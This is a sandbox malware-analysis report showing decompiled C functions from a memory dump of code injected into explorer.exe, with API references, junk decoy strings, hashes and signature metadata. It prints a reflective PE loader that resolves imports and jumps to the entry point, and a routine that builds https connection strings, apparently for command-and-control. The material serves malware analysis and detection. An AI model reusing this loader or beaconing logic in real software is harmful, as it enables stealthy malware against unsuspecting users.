						CreateEnhMetaFileA(0, "c.LyMrPDTmQQVFLI,gT.qt5dcglAo5Lr7Stf7 O1NR2b30r9GufhjKrL7BKyzJGZe oidfC,kkGLL6,SQ0LaDh0N lN9a BKBLy2HIu1Aa.vtaED,xOpF8CDoQ9cSIaoxnzPXF6WJLkA Q8prVYppxQUQ3nMYvltuwLIf5S8uIs,e1HHzCf5WZK8YhJCILytPvDElMNBNLeiGijE,sFI.NBg AVz y5u1KGLL1 0eN062ZqsMhgelO.34vm 1WkMnd21tATz5xjlLc eLrQIjcQ2xJJ3A WLjr,V  6zSX,PPLx.d4V8WZhzACOYBrj9jsKLd sNT6McrOQFSoeBQtbcq4lWtLF GAIKygQSoMwYWXVJGVM1iZMDRtA38h.8pBcC1XZEj0DIu0RI7KDru6XMcvNW daz HOrD5LN,Er3vGZmhMirCS2KX360BAas8cjsdGNmbn42AzsJW.PRQsyWT4J ZoI.w3Dyc5meTRfpPOXcYTvZiYGFNCpn2UlX V", 0, 0);
					}
					if(_v8 == 0) {
						_v8 = 0xfffffffd;
					} else {
						E00F5AB81( &_v8, 0);
						if(_v12 > 0) {
							_v8 = 0;
							L30:
							_t41 = E00F5CEF9(_t60, 0);
							_t80 = _t60;
							if(_t80 <= 0 && (_t80 < 0 || _t41 < 0x2bcf)) {
								CreateEnhMetaFileA(0, "g27tI6GF2PVohfLra1y7PWZ SVHJ5Zitl5FhGLwm1mlpzJucXe GbUYRGQu OQLCBfcvW k4ZaNyBJxvaO7cpv4BXLffD7CqEHX8V8hOvM,zCCg9C1Y0X89CWA3xcTuw x4.r0Kxsx1on6Kry.ZRj0HaYJuZ0ADA4ljohql.Ubjak1jBWjXHx262H,GyCzQ.h K.UQ 8zYXQdf27N3PF52dnvjQ3ODyYpR4nK3 Sj53PJuvEVvc1GfK,6CGgE4AFnDMw53APb1wkN2Zr47ARR,sl0duAl4PUGs,wYQ43cuB 3V6ZAdUmNBUrK ugp6t4RHOFQyD 9pVYRrMc2ZW5bWePHRBaNtNZ6js,Yq2XLI.fT3IaYA8oUiU0itTfG JhB.B.oZCKI.yNBwtCZAV.4muxcEnMuukJ zQ.TZR,SvbPIog9eSMgD7, vaoBKmwaTGikTUzdt Oy 9tTxo8z ZJYrK RfyoVlGLjAN 4rV u521Tq1B3lj v8k e KfaaZxDnJg4XyKRmOGKIQMyb.fGgUITnzYJ9NHB.gnDZhqE7M r8RLrV tT3aKbMO.HhOs Bu1", 0, 0);
							}
							return _v8;
						}
						_v8 = 0xfffffffe;
					}
					L27:
					_t61 = _t61 + 1;
				} while (_t61 < 3);
				goto L30;
			}

0x00f57a16
0x00f57a1c
0x00f57a20
0x00f57a36
0x00f57a36
0x00f57a3c
0x00f57a42
0x00f57a44
0x00f57a44
0x00000000
0x00f57a42
0x00f57a31
0x00000000
0x00f57a33
0x00f57a33
0x00000000
0x00f57a33
0x00f57a31
0x00f57a46
0x00f57a52
0x00f57a87
0x00f57a99
0x00f57aa0
0x00f57a89
0x00f57a89
0x00f57a90
0x00f57a90
0x00f57a61
0x00f57a63
0x00f57a75
0x00f57a7c
0x00f57a65
0x00f57a65
0x00f57a6c
0x00f57a6c
0x00f57a63
0x00f57aa7
0x00f57aae
0x00f57aae
0x00f57ab4
0x00000000
0x00000000
0x00f57ac4
0x00f57ac6
0x00f57acb
0x00f57b38
0x00000000
0x00f57b38
0x00f57acd
0x00f57ad7
0x00f57ada
0x00f57aed
0x00f57af0
0x00f57af5
0x00f57af8
0x00f57afa
0x00f57b0a
0x00f57b0a
0x00f57b13
0x00f57b2f
0x00f57b15
0x00f57b1a
0x00f57b24
0x00f57b48
0x00f57b4b
0x00f57b4c
0x00f57b52
0x00f57b54
0x00f57b64
0x00f57b64
0x00f57b71
0x00f57b71
0x00f57b26
0x00f57b26
0x00f57b3c
0x00f57b3c
0x00f57b3d
0x00000000

APIs

CreateEnhMetaFileA.GDI32(00000000,c.LyMrPDTmQQVFLI,gT.qt5dcglAo5Lr7Stf7 O1NR2b30r9GufhjKrL7BKyzJGZe oidfC,kkGLL6,SQ0LaDh0N lN9a BKBLy2HIu1Aa.vtaED,xOpF8CDoQ9cSIaoxnzPXF6WJLkA Q8prVYppxQUQ3nMYvltuwLIf5S8uIs,e1HHzCf5WZK8YhJCILytPvDElMNBNLeiGijE,sFI.NBg AVz y5u1KGLL1 0eN062ZqsMhgelO.34vm 1WkMnd21,00000000,00000000), ref: 00F57B0A
CreateEnhMetaFileA.GDI32(00000000,g27tI6GF2PVohfLra1y7PWZ SVHJ5Zitl5FhGLwm1mlpzJucXe GbUYRGQu OQLCBfcvW k4ZaNyBJxvaO7cpv4BXLffD7CqEHX8V8hOvM,zCCg9C1Y0X89CWA3xcTuw x4.r0Kxsx1on6Kry.ZRj0HaYJuZ0ADA4ljohql.Ubjak1jBWjXHx262H,GyCzQ.h K.UQ 8zYXQdf27N3PF52dnvjQ3ODyYpR4nK3 Sj53PJuvEVvc1GfK,6CGgE4AFnDMw,00000000,00000000), ref: 00F57B64

Strings

c.LyMrPDTmQQVFLI,gT.qt5dcglAo5Lr7Stf7 O1NR2b30r9GufhjKrL7BKyzJGZe oidfC,kkGLL6,SQ0LaDh0N lN9a BKBLy2HIu1Aa.vtaED,xOpF8CDoQ9cSIaoxnzPXF6WJLkA Q8prVYppxQUQ3nMYvltuwLIf5S8uIs,e1HHzCf5WZK8YhJCILytPvDElMNBNLeiGijE,sFI.NBg AVz y5u1KGLL1 0eN062ZqsMhgelO.34vm 1WkMnd21, xrefs: 00F57B04
g27tI6GF2PVohfLra1y7PWZ SVHJ5Zitl5FhGLwm1mlpzJucXe GbUYRGQu OQLCBfcvW k4ZaNyBJxvaO7cpv4BXLffD7CqEHX8V8hOvM,zCCg9C1Y0X89CWA3xcTuw x4.r0Kxsx1on6Kry.ZRj0HaYJuZ0ADA4ljohql.Ubjak1jBWjXHx262H,GyCzQ.h K.UQ 8zYXQdf27N3PF52dnvjQ3ODyYpR4nK3 Sj53PJuvEVvc1GfK,6CGgE4AFnDMw, xrefs: 00F57B5E

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: CreateFileMeta
String ID: c.LyMrPDTmQQVFLI,gT.qt5dcglAo5Lr7Stf7 O1NR2b30r9GufhjKrL7BKyzJGZe oidfC,kkGLL6,SQ0LaDh0N lN9a BKBLy2HIu1Aa.vtaED,xOpF8CDoQ9cSIaoxnzPXF6WJLkA Q8prVYppxQUQ3nMYvltuwLIf5S8uIs,e1HHzCf5WZK8YhJCILytPvDElMNBNLeiGijE,sFI.NBg AVz y5u1KGLL1 0eN062ZqsMhgelO.34vm 1WkMnd21$g27tI6GF2PVohfLra1y7PWZ SVHJ5Zitl5FhGLwm1mlpzJucXe GbUYRGQu OQLCBfcvW k4ZaNyBJxvaO7cpv4BXLffD7CqEHX8V8hOvM,zCCg9C1Y0X89CWA3xcTuw x4.r0Kxsx1on6Kry.ZRj0HaYJuZ0ADA4ljohql.Ubjak1jBWjXHx262H,GyCzQ.h K.UQ 8zYXQdf27N3PF52dnvjQ3ODyYpR4nK3 Sj53PJuvEVvc1GfK,6CGgE4AFnDMw
API String ID: 2005549212-996521835
Opcode ID: 2e5ee792c2f782baff7e2bfe2e6c39c8b5568bd5bad2becf9fa8a40ac8ed5c8c
Instruction ID: e07697633ca8ccba26444b6a6d7c764e446abdc6b15dc8cbb0e1f3fdadb6e140
Opcode Fuzzy Hash: 2e5ee792c2f782baff7e2bfe2e6c39c8b5568bd5bad2becf9fa8a40ac8ed5c8c
Instruction Fuzzy Hash: A841EF71E09319ABCB20BF95AC899EEBB75EB81322F200115EF01961A5D3344B8DB7D1

Uniqueness

Uniqueness Score: -1.00%

Function 00F6CD50, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00F6CD50(intOrPtr __edx, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				void* __ecx;
				void* __esi;
				char _t14;
				intOrPtr _t16;
				intOrPtr _t17;
				void* _t20;
				signed int _t21;
				intOrPtr _t23;
				intOrPtr _t24;
				void* _t35;
				intOrPtr _t37;
				intOrPtr* _t42;
				void* _t44;
				void* _t48;

				_t48 = __fp0;
				_t37 = __edx;
				_t42 =  *0xf896fc; // 0x547fac0
				if(_a4 != 0) {
					_t42 =  *0xf896f8; // 0x0
				}
				if(_t42 != 0) {
					_t14 = E00F5AC29( *_t42,  *((intOrPtr*)(_t42 + 4)));
					_v8 = _t14;
					__eflags = _t14;
					if(_t14 != 0) {
						E00F6C963(_t14,  *((intOrPtr*)(_t42 + 4)));
						_t16 =  *0xf89720; // 0xf90000
						__eflags =  *((intOrPtr*)(_t16 + 0xa4)) - 1;
						_pop(_t35);
						if( *((intOrPtr*)(_t16 + 0xa4)) != 1) {
							L8:
							_t17 = E00F5D25A(_a8, _v8,  *((intOrPtr*)(_t42 + 4)));
							_t44 = _t44 + 0xc;
							__eflags = _t17;
							if(_t17 >= 0) {
								L10:
								__eflags = _a12;
								if(_a12 != 0) {
									_t23 =  *0xf89720; // 0xf90000
									_t24 = E00F51091(_a8, 0,  *((intOrPtr*)(_t23 + 0xa0)));
									_t44 = _t44 + 0xc;
									__eflags = _t24;
									if(_t24 != 0) {
										E00F6CC3C(_t35, _t42, _t48, _t24);
									}
								}
								L13:
								E00F5AB81( &_v8, 0xffffffff);
								_t20 = E00F5CEF9(_t37, 0);
								__eflags = _t37;
								if(__eflags > 0) {
									L17:
									_t21 = 0;
									L18:
									return _t21;
								}
								if(__eflags < 0) {
									L16:
									CreateEnhMetaFileA(0, "7Cp8ulfRiVdKxK TgzbB4JmHr0.zzqvS6GCQ10oXDZpggFgsLyYMV0wSYhmYqt7oI1ZRfysKshd5QmCX e0KF9D4w3 FDpwfNIXFw0Ysp9Hcp8rAB2HYMzFS2edo,ZTMh05JvJEcAs AhuldbKm6i9 a tzhcRtPD3,QkpVoUvf,k0efxbqk22rJWJXFYLCImRTXSY0IF BILBzE4kbtiK69SjO zBaDdX2eC. O3HqJiajrFivrNuAZh0M5LJ4GmvRp zJvs3dB.AKxlzhmAZbqhQaHEIf7qvsslUxkmhogm D5d J7eFHgNHHlOFbksCL,Zg EID2hK UaHlkHi9Cb1Q,m Z59Q87.R5CfxFND94STq6LO2 .,Hd,kQqmSJHpduHr4m 1xopsWDIBa4ovw71.vHI8xci9958sB6CcidDdgT, gG3N4 ym.rXDzZq0gsJ41rStzH LH8ZTXQy5irLmSbJnn.rbU,,o9zVZ7l bEVXuj DplWKjfItC98DDXqdHeKrv 004T6TdXLgbLpsowv V1NV,,ORKc3OxfhQty,loncesO9U6V7GWZujfSXTOs4 YB4aXD5yncUh,cUfl5cUi6h4Un4QKrpFEjFeJHKn9BnKj1c yohxwjPgW010iBrCzUvuTxXWuZ60  u8alwreBq0kAYO veOgir2lYRCnVKMWO03FGdQS9g.ckowGo8dB2N4tT5 Hm2n9VlppXVAyQqp nb 0Shzb.GEf5f.7 uBtxY8DBcCZKytsxtNjeNPoHkEXqzdvqBMPInGDiKf PZYakcPfmmujka0o qjjw7fL.BjZgXxKRntx5q6tKCb0L L GN2zm GFvJuFQa t E.CK.QH3Pc9HtepzYP0PR21dCQI jOon,84 mg3AT0cdC2kn.eDsfUlyhci PfYm4hhlroC q8d9BQZLvLd,mhz.56H5DkyeMSqRRzRIMO6,wWuiM8zlEAwopv,A7jrczGM3LAg", 0, 0);
									goto L17;
								}
								__eflags = _t20 - 0x2bcf;
								if(_t20 >= 0x2bcf) {
									goto L17;
								}
								goto L16;
							}
							_push(0xfffffffd);
							_pop(0);
							goto L13;
						}
						__eflags = _a4;
						if(_a4 == 0) {
							goto L10;
						}
						goto L8;
					}
					_t21 = 0xfffffffe;
					goto L18;
				}
				BitBlt(0, 0x28, 0x26, 0x26, 0x4a, 0, 0x4b, 0x24, 0x15);
				_t21 = ArcTo(0, 0x29, 0x3d, 0x31, 0x2f, 0x29, 0x36, 0x37, 0x43) | 0xffffffff;
				goto L18;
			}

0x00f6cd50
0x00f6cd50
0x00f6cd56
0x00f6cd64
0x00f6cd66
0x00f6cd66
0x00f6cd6e
0x00f6cdaa
0x00f6cdb1
0x00f6cdb4
0x00f6cdb6
0x00f6cdc4
0x00f6cdc9
0x00f6cdce
0x00f6cdd6
0x00f6cdd7
0x00f6cdde
0x00f6cde7
0x00f6cdec
0x00f6cdef
0x00f6cdf1
0x00f6cdf8
0x00f6cdf8
0x00f6cdfb
0x00f6cdfd
0x00f6ce0c
0x00f6ce11
0x00f6ce14
0x00f6ce16
0x00f6ce19
0x00f6ce1e
0x00f6ce16
0x00f6ce1f
0x00f6ce25
0x00f6ce2b
0x00f6ce33
0x00f6ce35
0x00f6ce4e
0x00f6ce4e
0x00f6ce50
0x00f6ce54
0x00f6ce54
0x00f6ce37
0x00f6ce40
0x00f6ce48
0x00000000
0x00f6ce48
0x00f6ce39
0x00f6ce3e
0x00000000
0x00000000
0x00000000
0x00f6ce3e
0x00f6cdf3
0x00f6cdf5
0x00000000
0x00f6cdf5
0x00f6cdd9
0x00f6cddc
0x00000000
0x00000000
0x00000000
0x00f6cddc
0x00f6cdba
0x00000000
0x00f6cdba
0x00f6cd80
0x00f6cd9d
0x00000000

APIs

BitBlt.GDI32(00000000,00000028,00000026,00000026,0000004A,00000000,0000004B,00000024,00000015), ref: 00F6CD80
ArcTo.GDI32(00000000,00000029,0000003D,00000031,0000002F,00000029,00000036,00000037,00000043,?,?,00F58206,00000000,?,00000000), ref: 00F6CD97
CreateEnhMetaFileA.GDI32(00000000,7Cp8ulfRiVdKxK TgzbB4JmHr0.zzqvS6GCQ10oXDZpggFgsLyYMV0wSYhmYqt7oI1ZRfysKshd5QmCX e0KF9D4w3 FDpwfNIXFw0Ysp9Hcp8rAB2HYMzFS2edo,ZTMh05JvJEcAs AhuldbKm6i9 a tzhcRtPD3,QkpVoUvf,k0efxbqk22rJWJXFYLCImRTXSY0IF BILBzE4kbtiK69SjO zBaDdX2eC. O3HqJiajrFivrNuAZh0M5LJ4GmvRp,00000000,00000000), ref: 00F6CE48

Strings

7Cp8ulfRiVdKxK TgzbB4JmHr0.zzqvS6GCQ10oXDZpggFgsLyYMV0wSYhmYqt7oI1ZRfysKshd5QmCX e0KF9D4w3 FDpwfNIXFw0Ysp9Hcp8rAB2HYMzFS2edo,ZTMh05JvJEcAs AhuldbKm6i9 a tzhcRtPD3,QkpVoUvf,k0efxbqk22rJWJXFYLCImRTXSY0IF BILBzE4kbtiK69SjO zBaDdX2eC. O3HqJiajrFivrNuAZh0M5LJ4GmvRp, xrefs: 00F6CE42

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: CreateFileMeta
String ID: 7Cp8ulfRiVdKxK TgzbB4JmHr0.zzqvS6GCQ10oXDZpggFgsLyYMV0wSYhmYqt7oI1ZRfysKshd5QmCX e0KF9D4w3 FDpwfNIXFw0Ysp9Hcp8rAB2HYMzFS2edo,ZTMh05JvJEcAs AhuldbKm6i9 a tzhcRtPD3,QkpVoUvf,k0efxbqk22rJWJXFYLCImRTXSY0IF BILBzE4kbtiK69SjO zBaDdX2eC. O3HqJiajrFivrNuAZh0M5LJ4GmvRp
API String ID: 2005549212-1966110326
Opcode ID: 500550cad46d2662b823daa45e2d7d524706c5c386187fd3ad7341a642547f4d
Instruction ID: 42b3a3f51b8a9018cf0a49f9235ec8da912ad680a19afef5d2476983ddca3223
Opcode Fuzzy Hash: 500550cad46d2662b823daa45e2d7d524706c5c386187fd3ad7341a642547f4d
Instruction Fuzzy Hash: EA313532A40204BADB315A549C4AF7A3775FB95B70F200226F7E5AA0D0E6765950F3D1

Uniqueness

Uniqueness Score: -1.00%

Function 00F58FD0, Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 210
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00F58FD0(intOrPtr __edx, void* __fp0, intOrPtr* _a4) {
				short _v68;
				char _v100;
				char _v101;
				char _v116;
				char* _v120;
				intOrPtr _v128;
				intOrPtr _v132;
				char _v136;
				signed int _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t46;
				char _t51;
				signed int _t52;
				signed int _t53;
				void* _t56;
				intOrPtr _t58;
				signed int _t64;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr _t75;
				signed int _t77;
				void* _t80;
				intOrPtr _t82;
				signed int _t84;
				signed int _t86;
				signed int _t89;
				signed int _t95;
				signed int _t98;
				void* _t101;
				void* _t106;
				void* _t112;
				intOrPtr _t116;
				char* _t118;
				signed int _t122;
				intOrPtr* _t124;
				signed int _t128;
				void* _t130;
				void* _t131;
				void* _t133;

				_t116 = __edx;
				_t130 = (_t128 & 0xfffffff8) - 0x8c;
				_v140 = 5;
				_v120 = E00F5C979(0xa);
				_v132 = E00F5CC01(__edx, 3);
				_t46 =  *0xf89720; // 0xf90000
				_v128 = _t116;
				if(( *(_t46 + 0x1898) & 0x00000001) != 0) {
					_t95 = E00F6D918(_t46 + 0x648, __fp0, _t46 + 0x648, 0xf, 0x23);
					_t130 = _t130 + 0xc;
					_v140 = _t95;
				}
				_t124 = _a4;
				_t118 =  &_v100;
				E00F5CF36( *(_t124 + 4) & 0x0000ffff, _t118, 0xa);
				_push(0);
				_push( *((intOrPtr*)( *((intOrPtr*)(_t124 + 8)))));
				_push(_t118);
				_push(":");
				_push( *_t124);
				_t51 = E00F5B367("https://");
				_t131 = _t130 + 0x18;
				_v136 = _t51;
				if(_t51 != 0) {
					_t52 = E00F5C3B2(_t116,  *0xf897e8, 0x31);
					_pop(_t106);
					__eflags = _t52;
					if(__eflags != 0) {
						L17:
						_t97 = _v120;
						__eflags = _v120;
						if(__eflags == 0) {
							_t97 = "b";
						}
						_t53 = E00F630B6(_t106, __eflags);
						asm("sbb eax, eax");
						_t56 = E00F60776(_t116);
						_t58 =  *0xf89720; // 0xf90000
						_t98 = E00F64B8F(_t97, _t116, __eflags, _v136,  *_t124,  *(_t124 + 4) & 0x0000ffff, _t58 + 0x100c, _t97,  *0xf88000 & 0x0000ffff, _t56,  ~( ~_t53), _v132, _v128,  *((intOrPtr*)(_t124 + 0xc)));
						__eflags = _t98 - 1;
						if(_t98 != 1) {
							__eflags = _t98;
							if(__eflags != 0) {
								if(__eflags < 0) {
									_push(1);
									goto L26;
								}
							} else {
								E00F59587(1,  *(_t124 + 4),  *_t124);
								_push(_t98);
								goto L23;
							}
						} else {
							E00F59587(1,  *(_t124 + 4),  *_t124);
							_push(1);
							L23:
							E00F59A38(_t116);
						}
					} else {
						_t72 =  *0xf89720; // 0xf90000
						_t98 = E00F6416F(_t116, __eflags, _v136, _t72 + 0x100c,  *((intOrPtr*)(_t124 + 0xc)));
						_t133 = _t131 + 0xc;
						__eflags = _t98;
						if(_t98 >= 0) {
							_t75 =  *((intOrPtr*)(_t124 + 8));
							__eflags =  *(_t75 + 4);
							if( *(_t75 + 4) == 0) {
								_t86 = E00F5C3B2(_t116,  *0xf897e8, 0x31);
								_pop(_t106);
								__eflags = _t86;
								if(_t86 == 0) {
									 *((intOrPtr*)( *((intOrPtr*)(_t124 + 8)) + 4)) = E00F59D05(_t116);
									GetLastError();
									_t89 = E00F5ACD6("hDelE,rDtO9EJQ tJoCT0KaEHT4XomcsE36Drp5Q  .dZ8,AXH4fb1VRRvVv1VLKmBx5vesAY1KdpI4kFsdzadJHmsGszOfM.27bd5Xqkpgtri,CVgqaNwoOxuW UlqBRS0uZGdutt34a.Ln.tkPV27AI9B9Pi5PllNdFMaJLy5Ms dOI46zPltRU3JZDNkqWjzw4GudyR ahIm4jbnAaq13cPsd73D OKf.ux6g EmyBv8HipmP3KZ2DYO lvtlJPxAf JR,y77hzmSAr8xE0LGykDnsg6A0HOyNwOLZdGWIkz7nPW.6V4NZcsmzihkywybdCRdpq6CMI1cySiYlFoIMEeMd9gQ8UH85VXIupw4Nyi6qut.UlCCldnJiJZDrZ2bD9mLtJf6zemFtbIKN8Jnr7,rpXzhsz2 QDTbyaK3R,EByIbrtEDFOU5GBMZ40lwojKghfWsgfR70U9CtfBCBlvN2ZNX48,x3F7jg,05jA8edDhM4y3kLqz59VOxUH1pw1ZuYopWrlI.uwsoh  oGB faJXtb Eod0CFTP63  ZLIceZ396yCKIuL63wLG1YNxsLD1OPEtw7aIhMdp T2kmTIbhmKI.yRb0.HaF wb0YQ ojxTGHrTfLagaRdRAUVWqC,DV. q1boLyYsdpr6gBVrGUhgMBQWW6.e JRaDDGnuirCCKWmGncMz7ZEdIhO5UWO2Z0Nns.2O3SIyPNd QkKhu7kbXWx72Q7LVq8yc7OMH,Byf1OR8GNlibXjnK2sH4JmZrme76D1exz UI,3cK3WUrp,6RfklPb9AhAHMCDvnrp1x6,2sS tKI clrlNJfTHR3FmhWoAE6P4j T4M720pPgGXp8esdZ rvTYhrjX,yR,XthfuBDS4b wm3o8F8023I qtZdlvRGmZW,v C58D2X.NhnYz5e0Ia1gGO nW3.jJvVvvkpBO xy8zPpUDhEbNAA WIUlHI noZURS.PmCYJKX");
									_pop(_t106);
									_t122 = 0xf;
									__eflags = _t89 - _t122;
									if(_t89 <= _t122) {
										_t122 = _t89;
									}
									_t101 = 0;
									_v101 = 0;
									__eflags = _t122;
									if(_t122 != 0) {
										do {
											_t21 = _t101 + 0x42; // 0x42
											 *((char*)(_t133 + _t101 + 0x2c)) = _t21;
											MultiByteToWideChar(0, 0,  &_v116, 0xffffffff,  &_v68, 0x20);
											_t101 = _t101 + 1;
											__eflags = _t101 - _t122;
										} while (_t101 < _t122);
									}
								}
							}
							_t100 = _v120;
							__eflags = _v120;
							if(__eflags == 0) {
								_t100 = "b";
							}
							_t77 = E00F630B6(_t106, __eflags);
							asm("sbb eax, eax");
							_t80 = E00F60776(_t116);
							_t82 =  *0xf89720; // 0xf90000
							_t84 = E00F6498C(_t116, __eflags, _v136, _t82 + 0x100c, _t100,  *0xf88000 & 0x0000ffff, _t80,  ~( ~_t77), _v132, _v128,  *((intOrPtr*)( *((intOrPtr*)(_t124 + 8)) + 4)),  *((intOrPtr*)(_t124 + 0xc)));
							_t98 = _t84;
							_t131 = _t133 + 0x28;
							__eflags = _t98;
							if(_t98 != 0) {
								goto L6;
							} else {
								_push(_t84);
								_t112 = 0x31;
								E00F5C403(_t112);
								_t106 = 1;
								goto L17;
							}
						} else {
							L6:
							_push(1);
							L26:
							_t66 = _v140 * 0x3e8;
							__eflags = _t66;
							_t67 =  *0xf89740; // 0x547f6c8
							 *((intOrPtr*)(_t67 + 0xb8))(_t66);
						}
					}
					E00F5AB81( &_v136, 0xffffffff);
					_t64 = _t98;
				} else {
					_t64 = 0xffffffec;
				}
				return _t64;
			}

0x00f58fd0
0x00f58fd6
0x00f58fe1
0x00f58ff1
0x00f58ffa
0x00f58ffe
0x00f5900b
0x00f5900f
0x00f5901b
0x00f59020
0x00f59023
0x00f59023
0x00f59027
0x00f59030
0x00f59034
0x00f5903d
0x00f5903f
0x00f59043
0x00f59044
0x00f59049
0x00f59050
0x00f59055
0x00f59058
0x00f5905e
0x00f59070
0x00f59076
0x00f59077
0x00f59079
0x00f5917d
0x00f5917d
0x00f59181
0x00f59183
0x00f59185
0x00f59185
0x00f59195
0x00f5919c
0x00f591a1
0x00f591af
0x00f591cd
0x00f591d3
0x00f591d5
0x00f591e6
0x00f591e8
0x00f591ff
0x00f59201
0x00000000
0x00f59201
0x00f591ea
0x00f591f0
0x00f591f6
0x00000000
0x00f591f6
0x00f591d7
0x00f591dd
0x00f591e3
0x00f591f7
0x00f591f7
0x00f591fc
0x00f5907f
0x00f59082
0x00f59096
0x00f59098
0x00f5909b
0x00f5909d
0x00f590a6
0x00f590a9
0x00f590ad
0x00f590b7
0x00f590bd
0x00f590be
0x00f590c0
0x00f590ca
0x00f590cd
0x00f590d8
0x00f590dd
0x00f590e0
0x00f590e1
0x00f590e3
0x00f590e5
0x00f590e5
0x00f590e7
0x00f590e9
0x00f590ee
0x00f590f0
0x00f590f2
0x00f590f4
0x00f590f7
0x00f5910b
0x00f59111
0x00f59112
0x00f59112
0x00f590f2
0x00f590f0
0x00f590c0
0x00f59116
0x00f5911a
0x00f5911c
0x00f5911e
0x00f5911e
0x00f59134
0x00f5913b
0x00f59140
0x00f5914e
0x00f5915e
0x00f59163
0x00f59165
0x00f59168
0x00f5916a
0x00000000
0x00f59170
0x00f59170
0x00f59175
0x00f59176
0x00f5917c
0x00000000
0x00f5917c
0x00f5909f
0x00f5909f
0x00f5909f
0x00f59202
0x00f59206
0x00f59206
0x00f5920d
0x00f59212
0x00f59212
0x00f5909d
0x00f5921f
0x00f59226
0x00f59060
0x00f59062
0x00f59062
0x00f5922e

APIs

GetLastError.KERNEL32(?,?,?,?,0000000A), ref: 00F590CD
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00F5910B

Strings

hDelE,rDtO9EJQ tJoCT0KaEHT4XomcsE36Drp5Q .dZ8,AXH4fb1VRRvVv1VLKmBx5vesAY1KdpI4kFsdzadJHmsGszOfM.27bd5Xqkpgtri,CVgqaNwoOxuW UlqBRS0uZGdutt34a.Ln.tkPV27AI9B9Pi5PllNdFMaJLy5Ms dOI46zPltRU3JZDNkqWjzw4GudyR ahIm4jbnAaq13cPsd73D OKf.ux6g EmyBv8HipmP3KZ2DYO lvtlJPxA, xrefs: 00F590D3
https://, xrefs: 00F5904B

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide
String ID: hDelE,rDtO9EJQ tJoCT0KaEHT4XomcsE36Drp5Q .dZ8,AXH4fb1VRRvVv1VLKmBx5vesAY1KdpI4kFsdzadJHmsGszOfM.27bd5Xqkpgtri,CVgqaNwoOxuW UlqBRS0uZGdutt34a.Ln.tkPV27AI9B9Pi5PllNdFMaJLy5Ms dOI46zPltRU3JZDNkqWjzw4GudyR ahIm4jbnAaq13cPsd73D OKf.ux6g EmyBv8HipmP3KZ2DYO lvtlJPxA$https://
API String ID: 203985260-3335392935
Opcode ID: a9b20843e595a98ef6eeb8b58d184da09a4bdaae492483755de3dc18d2ccaa74
Instruction ID: 4eafa661fc49b35f3f621c4676dc9d8d7ab5d5c1f4e22847d30006e8848e7e0f
Opcode Fuzzy Hash: a9b20843e595a98ef6eeb8b58d184da09a4bdaae492483755de3dc18d2ccaa74
Instruction Fuzzy Hash: 35613732608301AFD724AF64DC82F7A77E8EB48721F144529FE85D61D1EBA9D848F711

Uniqueness

Uniqueness Score: -1.00%

Function 00F6D486, Relevance: 6.2, APIs: 4, Instructions: 206
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00F6D486(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed short* _v24;
				intOrPtr _v28;
				signed short* _v32;
				intOrPtr _v36;
				unsigned int _v40;
				unsigned int _v44;
				intOrPtr* _v48;
				signed short _v52;
				signed int _v53;
				signed int _v60;
				signed int _v64;
				signed int* _v68;
				struct HINSTANCE__* _v72;
				intOrPtr* _v76;
				intOrPtr _v80;
				_Unknown_base(*)()* _v84;
				void* _t181;
				intOrPtr _t224;

				_v8 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v16 = _v8;
				_t224 = _a4 -  *((intOrPtr*)(_v16 + 0x34));
				_v12 = _t224;
				if(_t224 == 0) {
					L13:
					while(0 != 0) {
					}
					if( *((intOrPtr*)(_v16 + 0x80)) == 0) {
						L35:
						_v20 =  *((intOrPtr*)(_v16 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v20;
						}
						 *((intOrPtr*)(_v16 + 0x34)) = _a4;
						return _v20(_a4, 1, _a8);
					}
					_v64 = 0x80000000;
					_v76 = _a4 +  *((intOrPtr*)(_v16 + 0x80));
					while( *((intOrPtr*)(_v76 + 0xc)) != 0) {
						_v72 = GetModuleHandleA( *((intOrPtr*)(_v76 + 0xc)) + _a4);
						if(_v72 == 0) {
							_v72 = LoadLibraryA( *((intOrPtr*)(_v76 + 0xc)) + _a4);
						}
						if(_v72 != 0) {
							if( *_v76 == 0) {
								_v68 =  *((intOrPtr*)(_v76 + 0x10)) + _a4;
							} else {
								_v68 =  *_v76 + _a4;
							}
							_v60 = _v60 & 0x00000000;
							while( *_v68 != 0) {
								if(( *_v68 & _v64) == 0) {
									_v80 =  *_v68 + _a4;
									_v84 = GetProcAddress(_v72, _v80 + 2);
								} else {
									_v84 = GetProcAddress(_v72,  *_v68 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v76 + 0x10)) == 0) {
									 *_v68 = _v84;
								} else {
									 *( *((intOrPtr*)(_v76 + 0x10)) + _a4 + _v60) = _v84;
								}
								_v68 =  &(_v68[1]);
								_v60 = _v60 + 4;
							}
							_v76 = _v76 + 0x14;
							continue;
						} else {
							_t181 = 0xfffffffd;
							return _t181;
						}
					}
					goto L35;
				}
				_v24 = _a4 +  *((intOrPtr*)(_v16 + 0xa0));
				_v28 =  *((intOrPtr*)(_v16 + 0xa4));
